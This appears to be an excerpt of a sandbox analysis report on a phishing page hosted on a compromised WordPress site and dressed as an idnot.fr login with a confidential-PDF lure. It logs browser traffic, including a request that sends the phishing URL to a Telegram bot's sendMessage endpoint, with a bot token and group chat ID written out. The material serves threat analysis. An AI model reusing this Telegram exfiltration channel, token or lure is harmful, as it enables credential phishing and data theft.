                        2024-08-30 22:35:46 UTC7972INData Raw: 2f 2a 0d 0a 20 2a 20 6a 71 75 65 72 79 2e 63 6f 75 6e 74 64 6f 77 6e 54 69 6d 65 72 2e 6d 69 6e 2e 6a 73 20 31 2e 30 2e 38 0d 0a 20 2a 20 41 75 74 68 6f 72 20 2d 20 48 61 72 73 68 65 6e 20 41 6d 61 72 6e 61 74 68 20 50 61 6e 64 65 79 0d 0a 20 2a 20 56 65 72 73 69 6f 6e 20 2d 20 31 2e 30 2e 38 0d 0a 20 2a 20 52 65 6c 65 61 73 65 20 2d 20 31 38 74 68 20 41 70 72 69 6c 20 32 30 31 35 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 2d 20 32 30 31 38 20 48 61 72 73 68 65 6e 20 50 61 6e 64 65 79 0d 0a 2a 2f 0d 0a 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 63 29 7b 76 61 72 20 53 3d 6e 2e 65 78 74 65 6e 64 28 7b 7d 2c 6e 2e 66 6e 2e 63 6f 75 6e 74 64 6f 77 6e 74 69 6d 65 72 2e 64 65 66 61 75 6c 74
                        Data Ascii: /* * jquery.countdownTimer.min.js 1.0.8 * Author - Harshen Amarnath Pandey * Version - 1.0.8 * Release - 18th April 2015 * Copyright (c) 2014 - 2018 Harshen Pandey*/!function(n){function t(t,c){var S=n.extend({},n.fn.countdowntimer.default
                        2024-08-30 22:35:46 UTC8000INData Raw: 65 6e 67 74 68 3c 32 26 26 28 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 3d 22 30 22 2b 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 29 2c 53 28 6e 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2b 22 20 73 65 63 22 29 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2d 3d 74 2e 74 69 63 6b 49 6e 74 65 72 76 61 6c 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 3c 30 26 26 28 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 68 6f 75 72 73 5f 53 22 2b 65 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 6d 69 6e 75 74 65 73 5f 53 22 2b 65 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c
                        Data Ascii: ength<2&&(window["seconds_S"+e]="0"+window["seconds_S"+e]),S(n,window["seconds_S"+e]+" sec"),window["seconds_S"+e]-=t.tickInterval,window["seconds_S"+e]<0&&(delete window["hours_S"+e],delete window["minutes_S"+e],delete window["seconds_S"+e],clearInterval
                        2024-08-30 22:35:46 UTC4307INData Raw: 63 6f 6e 64 73 28 77 69 6e 64 6f 77 5b 22 73 74 61 72 74 44 61 74 65 22 2b 6f 5d 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 2b 74 2e 74 69 63 6b 49 6e 74 65 72 76 61 6c 29 29 3a 28 53 28 6e 2c 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 29 2c 22 77 69 74 68 6e 6f 53 74 61 72 74 22 3d 3d 65 3f 28 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 64 61 74 65 54 69 6d 65 22 2b 6f 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 73 74 61 72 74 54 69 6d 65 22 2b 6f 5d 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 77 69 6e 64 6f 77 5b 22 74 69 6d 65 72 5f 67 69 76 65 6e 44 61 74 65 22 2b 6f 5d 29 29 3a 22 77 69 74
                        Data Ascii: conds(window["startDate"+o].getSeconds()+t.tickInterval)):(S(n,"00"+t.timeSeparator+"00"+t.timeSeparator+"00"+t.timeSeparator+"00"),"withnoStart"==e?(delete window["dateTime"+o],delete window["startTime"+o],clearInterval(window["timer_givenDate"+o])):"wit


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.449770149.154.167.2204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:46 UTC546OUTGET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1
                        Host: api.telegram.org
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:47 UTC388INHTTP/1.1 200 OK
                        Server: nginx/1.18.0
                        Date: Fri, 30 Aug 2024 22:35:46 GMT
                        Content-Type: application/json
                        Content-Length: 428
                        Connection: close
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        2024-08-30 22:35:47 UTC428INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 34 31 36 33 35 32 31 33 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 79 20 6c 6f 76 65 72 20 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 58 72 65 73 75 6c 74 65 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 34 33 37 36 33 34 32 35 2c 22 74 69 74 6c 65 22 3a 22 46 6f 72 20 4c 69 6e 6b 73 20 53 68 65 65 74 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 30 35
                        Data Ascii: {"ok":true,"result":{"message_id":410122,"from":{"id":1416352134,"is_bot":true,"first_name":"Gay lover bot","username":"Xresultes_bot"},"chat":{"id":-4243763425,"title":"For Links Sheets","type":"group","all_members_are_administrators":true},"date":172505


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.44977188.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:47 UTC718OUTGET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:47 UTC255INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:47 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 02 Jun 2019 21:03:13 GMT
                        ETag: "aa6-58a5d93690f7a"
                        Accept-Ranges: bytes
                        Content-Length: 2726
                        Content-Type: image/png
                        2024-08-30 22:35:47 UTC2726INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 0a 6d 49 44 41 54 58 c3 9d 97 6b 6c 1c d7 75 c7 7f 77 66 76 f6 fd e6 2e 97 5c 2e df b2 24 3e 24 59 22 29 91 94 15 3b 69 5c 19 b6 24 3b 6e 12 1b 85 5c c9 35 da b4 28 da 34 41 0a a1 49 da a2 40 da 06 09 90 d4 89 13 d8 f0 87 c4 b5 63 24 96 e2 c0 82 e5 20 6e 15 b7 92 63 cb 92 a2 07 2d 8b 92 29 2e 97 8f 5d 8a 8f 5d 52 dc 17 87 33 73 fb 81 b2 2b d9 71 94 f4 7c 99 b9 b8 e7 9c ff 7f e6 9e 73 cf 39 82 df 41 d2 f5 ad c2 25 94 06 4d 70 87 40 f4 0b e8 01 ea 81 a8 04 5b c0 3c 70 d5 46 be 25 25 6f 58 f0 7a 49 da 93 ed d9 51 fb 56 be c5 6f db 9c 48 b6 29 3a 62 9d 10 dc af 22 3e 2d 60 3d e0 fc 28 fd aa 00 05 96 35 c9 08 f0 a2 25 e5 8f cb 52 5e 6c c9 5e b1 7e 2f 02 5f
                        Data Ascii: PNGIHDR szzmIDATXkluwfv.\.$>$Y");i\$;n\5(4AI@c$ nc-).]]R3s+q|s9A%Mp@[<pF%%oXzIQVoH):b">-`=(5%R^l^~/_


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.44977288.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:48 UTC400OUTGET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:48 UTC255INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:48 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 02 Jun 2019 21:03:13 GMT
                        ETag: "aa6-58a5d93690f7a"
                        Accept-Ranges: bytes
                        Content-Length: 2726
                        Content-Type: image/png
                        2024-08-30 22:35:48 UTC2726INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 0a 6d 49 44 41 54 58 c3 9d 97 6b 6c 1c d7 75 c7 7f 77 66 76 f6 fd e6 2e 97 5c 2e df b2 24 3e 24 59 22 29 91 94 15 3b 69 5c 19 b6 24 3b 6e 12 1b 85 5c c9 35 da b4 28 da 34 41 0a a1 49 da a2 40 da 06 09 90 d4 89 13 d8 f0 87 c4 b5 63 24 96 e2 c0 82 e5 20 6e 15 b7 92 63 cb 92 a2 07 2d 8b 92 29 2e 97 8f 5d 8a 8f 5d 52 dc 17 87 33 73 fb 81 b2 2b d9 71 94 f4 7c 99 b9 b8 e7 9c ff 7f e6 9e 73 cf 39 82 df 41 d2 f5 ad c2 25 94 06 4d 70 87 40 f4 0b e8 01 ea 81 a8 04 5b c0 3c 70 d5 46 be 25 25 6f 58 f0 7a 49 da 93 ed d9 51 fb 56 be c5 6f db 9c 48 b6 29 3a 62 9d 10 dc af 22 3e 2d 60 3d e0 fc 28 fd aa 00 05 96 35 c9 08 f0 a2 25 e5 8f cb 52 5e 6c c9 5e b1 7e 2f 02 5f
                        Data Ascii: PNGIHDR szzmIDATXkluwfv.\.$>$Y");i\$;n\5(4AI@c$ nc-).]]R3s+q|s9A%Mp@[<pF%%oXzIQVoH):b">-`=(5%R^l^~/_


                        Click to jump to process

                        Click to jump to process

                        Click to jump to process

                        Target ID:0
                        Start time:18:35:31
                        Start date:30/08/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff76e190000
                        File size:3'242'272 bytes
                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:2
                        Start time:18:35:36
                        Start date:30/08/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                        Imagebase:0x7ff76e190000
                        File size:3'242'272 bytes
                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:3
                        Start time:18:35:39
                        Start date:30/08/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html"
                        Imagebase:0x7ff76e190000
                        File size:3'242'272 bytes
                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        No disassembly